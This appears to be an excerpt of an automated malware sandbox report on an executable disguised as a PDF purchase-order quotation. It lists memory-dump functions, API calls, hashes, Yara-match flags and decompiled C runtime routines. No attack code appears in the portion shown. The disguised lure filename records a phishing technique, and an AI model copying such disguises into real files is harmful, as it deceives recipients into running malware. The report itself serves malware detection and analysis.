                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,00000000,?,?,?,00B09647,?,?,00000100,5EFC4D8B,?,?), ref: 00B094F0
                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,5EFC4D8B,00000100,00000000,00000000,?,?,00000000,?,00000000,00000000,00000000,00000000), ref: 00B095D0
                                                  • __freea.LIBCMT ref: 00B095DD
                                                    • Part of subcall function 00AF4D9C: HeapAlloc.KERNEL32(00000000,00000000,00000000,?,00B023E1,00000220,00000000,00000000,00000001), ref: 00AF4DCE
                                                  • __freea.LIBCMT ref: 00B095E6
                                                  • __freea.LIBCMT ref: 00B0960B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ByteCharMultiWide__freea$AllocHeap
                                                  • String ID:
                                                  • API String ID: 3147120248-0
                                                  • Opcode ID: dd90fabec8cbfeaca1f2b47ee9df282440ad6515f5361573bfc0ac7a69d7f6d2
                                                  • Instruction ID: f6897e9bf4bfdd99e451b7011cfcff0398ffbd8847f00793426db43f0e42e676
                                                  • Opcode Fuzzy Hash: dd90fabec8cbfeaca1f2b47ee9df282440ad6515f5361573bfc0ac7a69d7f6d2
                                                  • Instruction Fuzzy Hash: 1F51B17250020AAFEF269F55CC85EBB3BE9EB54B50F1541A9F905A7282EB31DC1186A0
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0C680, Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 279COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00B0C905
                                                    • Part of subcall function 00AF68E9: IsProcessorFeaturePresent.KERNEL32(00000017,00AF68BB,?,?,?,?,?,?,?,?,00AF68C8,00000000,00000000,00000000,00000000,00000000), ref: 00AF68EB
                                                    • Part of subcall function 00AF68E9: GetCurrentProcess.KERNEL32(C0000417), ref: 00AF690E
                                                    • Part of subcall function 00AF68E9: TerminateProcess.KERNEL32(00000000), ref: 00AF6915
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                  • String ID: SystemRoot
                                                  • API String ID: 2667617558-2034820756
                                                  • Opcode ID: 0a425a84d31f59bbb3214c7d56d006f1b16a8d6fd369e2cee5b06772013f458f
                                                  • Instruction ID: b84dbea03b70cda2b9ad1c894f27bab2ddbd072476e2c1df408a07a70edd55ea
                                                  • Opcode Fuzzy Hash: 0a425a84d31f59bbb3214c7d56d006f1b16a8d6fd369e2cee5b06772013f458f
                                                  • Instruction Fuzzy Hash: 4B91A071D0020A9BDF15CFA8C881BBEBFF5EF49304F1842A9E445A7282D7759D45CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF1829, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 109COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleFileNameW.KERNEL32(00000000,00B26F3A,00000104), ref: 00AF1886
                                                    • Part of subcall function 00AF68E9: IsProcessorFeaturePresent.KERNEL32(00000017,00AF68BB,?,?,?,?,?,?,?,?,00AF68C8,00000000,00000000,00000000,00000000,00000000), ref: 00AF68EB
                                                    • Part of subcall function 00AF68E9: GetCurrentProcess.KERNEL32(C0000417), ref: 00AF690E
                                                    • Part of subcall function 00AF68E9: TerminateProcess.KERNEL32(00000000), ref: 00AF6915
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Process$CurrentFeatureFileModuleNamePresentProcessorTerminate
                                                  • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                  • API String ID: 872218275-4022980321
                                                  • Opcode ID: 6a2f49acfbcf2665fb391580471eb9aa60f93499127a79af712403b8b4e9a2ff
                                                  • Instruction ID: cc08475fd6d5414aaddb55d2622af8c6a3fa95940e8b289a75a4012ae1896ef8
                                                  • Opcode Fuzzy Hash: 6a2f49acfbcf2665fb391580471eb9aa60f93499127a79af712403b8b4e9a2ff
                                                  • Instruction Fuzzy Hash: 5621F73268020DB6DF252B95ED82EBB3B9E9B90794F400064FE08521A1E761CE62C1D1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00403632, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 27%
                                                  			E00403632(void* __ecx, intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _t10;
				int _t13;
				int _t19;
				signed int _t21;

				_t10 =  *0x412014; // 0x9e6834eb
				_v8 = _t10 ^ _t21;
				_v12 = _v12 & 0x00000000;
				_t13 =  *0x40c0dc(0, L"mscoree.dll",  &_v12, __ecx, __ecx);
				if(_t13 != 0) {
					_t13 = GetProcAddress(_v12, "CorExitProcess");
					_t19 = _t13;
					if(_t19 != 0) {
						E0040C15C();
						_t13 =  *_t19(_a4);
					}
				}
				if(_v12 != 0) {
					_t13 = FreeLibrary(_v12);
				}
				E004018CC();
				return _t13;
			}









                                                  0x00403639
                                                  0x00403640
                                                  0x00403643
                                                  0x00403652
                                                  0x0040365a
                                                  0x00403665
                                                  0x0040366b
                                                  0x0040366f
                                                  0x00403676
                                                  0x0040367c
                                                  0x0040367c
                                                  0x0040367e
                                                  0x00403683
                                                  0x00403688
                                                  0x00403688
                                                  0x00403693
                                                  0x0040369b

                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002), ref: 00403652
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00403665
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00403627,00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000), ref: 00403688
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                                                  • Instruction ID: 2a5f1b52f49e2644cdc997ca28138b4c7ff7fe3d24fc8903f8dd75b8825c5772
                                                  • Opcode Fuzzy Hash: cf427baca09bca2fe7784295da489c0a85b1d2c95ce850e6db67983e50b5df7d
                                                  • Instruction Fuzzy Hash: D7F0A431A0020CFBDB109FA1DD49B9EBFB9EB04711F00427AF805B22A0DB754A40CA98
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AD90D7, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00AD90AE,?,?,00AD9076,?,?), ref: 00AD90F7
                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00AD910A
                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,00AD90AE,?,?,00AD9076,?,?), ref: 00AD912D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                  • String ID: CorExitProcess$mscoree.dll
                                                  • API String ID: 4061214504-1276376045
                                                  • Opcode ID: a7a5815d73a682c089b160f8526b3464930681cb6c408b50cdd468f014fd370d
                                                  • Instruction ID: bfb3a324a115986d73c161d84921b83319f61b7e630b887d38c9b0d375035d4b
                                                  • Opcode Fuzzy Hash: a7a5815d73a682c089b160f8526b3464930681cb6c408b50cdd468f014fd370d
                                                  • Instruction Fuzzy Hash: 2CF04F31A50218FBCB219F90DC0DFDEBFB9EF08751F4141A9B806A2260CF348A85DA90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF8A44, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35libraryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000800,?,00AF89FD), ref: 00AF8A53
                                                  • GetLastError.KERNEL32(?,00AF89FD), ref: 00AF8A5D
                                                  • LoadLibraryExW.KERNEL32(?,00000000,00000000), ref: 00AF8A9B
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: LibraryLoad$ErrorLast
                                                  • String ID: api-ms-$ext-ms-
                                                  • API String ID: 3177248105-537541572
                                                  • Opcode ID: edcb6bb7d3cb3d80d125f31cd5368b9a97c317907edd56828219fcf3c0dda3f7
                                                  • Instruction ID: 53cf63851472bbe17ea75c21d366cbf8d11f0fa43af06e81d893eaa7b0f1dc07
                                                  • Opcode Fuzzy Hash: edcb6bb7d3cb3d80d125f31cd5368b9a97c317907edd56828219fcf3c0dda3f7
                                                  • Instruction Fuzzy Hash: AFF012317D4209BAEB106BA1EC06F693E95EB10B90F554061FB4CA84E1EF75D9608644
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF384F, Relevance: 7.7, APIs: 5, Instructions: 187COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00AF4D9C: HeapAlloc.KERNEL32(00000000,00000000,00000000,?,00B023E1,00000220,00000000,00000000,00000001), ref: 00AF4DCE
                                                  • _free.LIBCMT ref: 00AF395A
                                                  • _free.LIBCMT ref: 00AF3971
                                                  • _free.LIBCMT ref: 00AF3990
                                                  • _free.LIBCMT ref: 00AF39AB
                                                  • _free.LIBCMT ref: 00AF39C2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free$AllocHeap
                                                  • String ID:
                                                  • API String ID: 1835388192-0
                                                  • Opcode ID: e63fe6fa5ed32ef674e30602b061ec98cb6d32fc19251bda99acdb506aef9a9e
                                                  • Instruction ID: 7e5f55b76c90c4c01101d498e5ddc2197fda083bb8a27514b0a474b72a8a8c46
                                                  • Opcode Fuzzy Hash: e63fe6fa5ed32ef674e30602b061ec98cb6d32fc19251bda99acdb506aef9a9e
                                                  • Instruction Fuzzy Hash: 3551C372A00308AFDF20DFA9C891A7AB7F4EF58720F14456DFA49D7250E775EA018B80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF41E8, Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free
                                                  • String ID:
                                                  • API String ID: 269201875-0
                                                  • Opcode ID: 64aad740e4554ef81f33a60b8c3ee7f4c85f031c4da33fb0eb6282ce3892ba5a
                                                  • Instruction ID: cbe9fbf6d8af29b0d4133e5ad0e463463ee91587e23446d91c940e3b72759890
                                                  • Opcode Fuzzy Hash: 64aad740e4554ef81f33a60b8c3ee7f4c85f031c4da33fb0eb6282ce3892ba5a
                                                  • Instruction Fuzzy Hash: 9441A376A002049FDB24DFB8C881AAEB7F5EF88714F1545A9F615EB391DB31AD01DB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 004062B8, Relevance: 7.6, APIs: 5, Instructions: 110COMMON
                                                  Download Yara Rule
                                                  C-Code - Quality: 79%
                                                  			E004062B8(void* __edx, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				void* __ebx;
				void* __edi;
				signed int _t34;
				signed int _t40;
				int _t45;
				int _t52;
				void* _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t71;
				signed int _t72;
				short* _t73;

				_t34 =  *0x412014; // 0x9e6834eb
				_v8 = _t34 ^ _t72;
				_push(_t53);
				E00403F2B(_t53,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t52 =  *(_v24 + 8);
					_t57 = _t52;
					_a24 = _t52;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					E004018CC();
					return _t67;
				}
				_t55 = _t40 + _t40;
				_t17 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				if((_t17 & _t40) == 0) {
					_t71 = 0;
					L11:
					if(_t71 != 0) {
						E00402460(_t67, _t71, _t67, _t55);
						_t45 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t71, _v12);
						if(_t45 != 0) {
							_t67 = GetStringTypeW(_a8, _t71, _t45, _a20);
						}
					}
					L14:
					E004063D5(_t71);
					goto L15;
				}
				_t20 = _t55 + 8; // 0x8
				asm("sbb eax, eax");
				_t47 = _t40 & _t20;
				_t21 = _t55 + 8; // 0x8
				_t63 = _t21;
				if((_t40 & _t20) > 0x400) {
					asm("sbb eax, eax");
					_t71 = E00403E3D(_t63, _t47 & _t63);
					if(_t71 == 0) {
						goto L14;
					}
					 *_t71 = 0xdddd;
					L9:
					_t71 =  &(_t71[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E004018E0();
				_t71 = _t73;
				if(_t71 == 0) {
					goto L14;
				}
				 *_t71 = 0xcccc;
				goto L9;
			}























                                                  0x004062c0
                                                  0x004062c7
                                                  0x004062ca
                                                  0x004062d3
                                                  0x004062d8
                                                  0x004062dd
                                                  0x004062e2
                                                  0x004062e5
                                                  0x004062e7
                                                  0x004062e7
                                                  0x004062ec
                                                  0x00406305
                                                  0x0040630b
                                                  0x00406310
                                                  0x004063af
                                                  0x004063b3
                                                  0x004063b8
                                                  0x004063b8
                                                  0x004063cc
                                                  0x004063d4
                                                  0x004063d4
                                                  0x00406316
                                                  0x00406319
                                                  0x0040631e
                                                  0x00406322
                                                  0x0040636e
                                                  0x00406370
                                                  0x00406372
                                                  0x00406377
                                                  0x0040638e
                                                  0x00406396
                                                  0x004063a6
                                                  0x004063a6
                                                  0x00406396
                                                  0x004063a8
                                                  0x004063a9
                                                  0x00000000
                                                  0x004063ae
                                                  0x00406324
                                                  0x00406329
                                                  0x0040632b
                                                  0x0040632d
                                                  0x0040632d
                                                  0x00406335
                                                  0x00406352
                                                  0x0040635c
                                                  0x00406361
                                                  0x00000000
                                                  0x00000000
                                                  0x00406363
                                                  0x00406369
                                                  0x00406369
                                                  0x00000000
                                                  0x00406369
                                                  0x00406339
                                                  0x0040633d
                                                  0x00406342
                                                  0x00406346
                                                  0x00000000
                                                  0x00000000
                                                  0x00406348
                                                  0x00000000

                                                  APIs
                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000100,?,00000000,?,?,00000000), ref: 00406305
                                                  • __alloca_probe_16.LIBCMT ref: 0040633D
                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0040638E
                                                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 004063A0
                                                  • __freea.LIBCMT ref: 004063A9
                                                    • Part of subcall function 00403E3D: RtlAllocateHeap.NTDLL(00000000,?,00000004), ref: 00403E6F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                  • String ID:
                                                  • API String ID: 313313983-0
                                                  • Opcode ID: ec30a5341e526c775fee802de3ab7847f5c8424ca2981861d1408554259e06d7
                                                  • Instruction ID: a1348b344bfdb8beedea85c2379656fd8e164ea4191dcb9080565a587d22e55f
                                                  • Opcode Fuzzy Hash: ec30a5341e526c775fee802de3ab7847f5c8424ca2981861d1408554259e06d7
                                                  • Instruction Fuzzy Hash: AE31B072A0020AABDF249F65DC85DAF7BA5EF40310B05423EFC05E6290E739CD65DB94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFA582, Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00AFA622
                                                    • Part of subcall function 00AF4D62: HeapFree.KERNEL32(00000000,00000000,?,00AF440C), ref: 00AF4D78
                                                    • Part of subcall function 00AF4D62: GetLastError.KERNEL32(?,?,00AF440C), ref: 00AF4D8A
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ErrorFreeHeapLast_free
                                                  • String ID:
                                                  • API String ID: 1353095263-0
                                                  • Opcode ID: b7aa3a299cbe1475a8dbb97881b1e6858afaf7b88173049d76471e964fbca0e1
                                                  • Instruction ID: b590f6d8b112805e754d96b17d431bcd23d272f3ce6d59453871d7ce70413d28
                                                  • Opcode Fuzzy Hash: b7aa3a299cbe1475a8dbb97881b1e6858afaf7b88173049d76471e964fbca0e1
                                                  • Instruction Fuzzy Hash: FA11E2B250410CABDF217BF1CD05ABE7BE8EF99360F150019F709D7101EA75880196A2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFC861, Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetLastError.KERNEL32(?,?,B47FD95F,00AF69E8,00AF4D88,?,?,00AF440C), ref: 00AFC866
                                                  • SetLastError.KERNEL32(00000000,00000006,000000FF,?,B47FD95F,00AF69E8,00AF4D88,?,?,00AF440C), ref: 00AFC88C
                                                  • _free.LIBCMT ref: 00AFC8CC
                                                  • _free.LIBCMT ref: 00AFC8FF
                                                  • SetLastError.KERNEL32(00000000), ref: 00AFC90C
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: ErrorLast$_free
                                                  • String ID:
                                                  • API String ID: 3170660625-0
                                                  • Opcode ID: 743adef797e81e1c1aedd5502bfff3f54cab558878b0dd029a3c7d38d95226a7
                                                  • Instruction ID: b2f2d5c3a12904f32c0bac5c35e0482750c27bc28b9c8a98e9e7865be0cbba59
                                                  • Opcode Fuzzy Hash: 743adef797e81e1c1aedd5502bfff3f54cab558878b0dd029a3c7d38d95226a7
                                                  • Instruction Fuzzy Hash: C211A17291060DB6CA2127FAAF85D3B36A9AFC4BB47250234F715E31E1DF28CD1241A1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0D02C, Relevance: 7.6, APIs: 5, Instructions: 52COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 00B0C595: __dosmaperr.LIBCMT ref: 00B0C5F5
                                                    • Part of subcall function 00B0C595: _free.LIBCMT ref: 00B0C664
                                                  • _free.LIBCMT ref: 00B0D04E
                                                    • Part of subcall function 00AF4D62: HeapFree.KERNEL32(00000000,00000000,?,00AF440C), ref: 00AF4D78
                                                    • Part of subcall function 00AF4D62: GetLastError.KERNEL32(?,?,00AF440C), ref: 00AF4D8A
                                                  • _free.LIBCMT ref: 00B0D070
                                                  • _free.LIBCMT ref: 00B0D078
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast__dosmaperr
                                                  • String ID:
                                                  • API String ID: 2121076959-0
                                                  • Opcode ID: 168a1695bb66eb4f00bc486af1900090672f166645ccaa01624ef7fb8a708746
                                                  • Instruction ID: c7fc5a9e88def1f84474a1fecc2a0e8476ef6c6fd8ca383a8b77e0de8d20ddae
                                                  • Opcode Fuzzy Hash: 168a1695bb66eb4f00bc486af1900090672f166645ccaa01624ef7fb8a708746
                                                  • Instruction Fuzzy Hash: 47019271905218BBDF21AFE4DD429AEBFB8EF49330B200295FD14A21D0EF319E119650
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B042C8, Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00B042E0
                                                    • Part of subcall function 00AF4D62: HeapFree.KERNEL32(00000000,00000000,?,00AF440C), ref: 00AF4D78
                                                    • Part of subcall function 00AF4D62: GetLastError.KERNEL32(?,?,00AF440C), ref: 00AF4D8A
                                                  • _free.LIBCMT ref: 00B042F2
                                                  • _free.LIBCMT ref: 00B04304
                                                  • _free.LIBCMT ref: 00B04316
                                                  • _free.LIBCMT ref: 00B04328
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: _free$ErrorFreeHeapLast
                                                  • String ID:
                                                  • API String ID: 776569668-0
                                                  • Opcode ID: 9437e22b3a9d74f85ce991df19d2ed006275e098a3b9d78c9a8dc793ea28c819
                                                  • Instruction ID: 2bab6f82ed95cddf951b7673e156d2ab0bf727dcacc35d6c3c85e5eac9f4eed8
                                                  • Opcode Fuzzy Hash: 9437e22b3a9d74f85ce991df19d2ed006275e098a3b9d78c9a8dc793ea28c819
                                                  • Instruction Fuzzy Hash: EEF096B2504208E7CA30FB99F682D1B7BD9EA487103545846F308DB551CF34FC808654
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AF19FA, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 123COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID:
                                                  • String ID: C:\Users\user\Desktop\PO 2010029_pdf Quotation from Alibaba Ale.exe
                                                  • API String ID: 0-2307794731
                                                  • Opcode ID: edf885e57e6e6e23a9ab8c24e9726bc48084b34246acca2ab136bfcbcbde25b6
                                                  • Instruction ID: 103433e62b3261d8fe782d26879363e41eebd25cd95121b30aa960e77b458b04
                                                  • Opcode Fuzzy Hash: edf885e57e6e6e23a9ab8c24e9726bc48084b34246acca2ab136bfcbcbde25b6
                                                  • Instruction Fuzzy Hash: 1D417F71A4121CEBDB21EBD9DD819BEBBB8EF89350B10406AF60597250EB718A41CB90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00B0C931, Relevance: 6.3, APIs: 4, Instructions: 319COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • _free.LIBCMT ref: 00B0CC01
                                                    • Part of subcall function 00AF68E9: IsProcessorFeaturePresent.KERNEL32(00000017,00AF68BB,?,?,?,?,?,?,?,?,00AF68C8,00000000,00000000,00000000,00000000,00000000), ref: 00AF68EB
                                                    • Part of subcall function 00AF68E9: GetCurrentProcess.KERNEL32(C0000417), ref: 00AF690E
                                                    • Part of subcall function 00AF68E9: TerminateProcess.KERNEL32(00000000), ref: 00AF6915
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp Download File
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp Download File
                                                  Similarity
                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                  • String ID:
                                                  • API String ID: 2667617558-0
                                                  • Opcode ID: 9620b1184beb738bad4d28ed1740639fa095657effaffa23e65cb2bffc0508df
                                                  • Instruction ID: e18ca9f11e6b329f1c03b364773544bb29c24dcf25aa140ad3c1a2a9bf758521
                                                  • Opcode Fuzzy Hash: 9620b1184beb738bad4d28ed1740639fa095657effaffa23e65cb2bffc0508df
                                                  • Instruction Fuzzy Hash: EDB18F71E002099BDF24DFA8D882AEEBFF5EF48710F1445AAE905EB291E7319D41CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00AFCA42, Relevance: 6.3, APIs: 4, Instructions: 311COMMON
                                                  Download Yara Rule
                                                  APIs
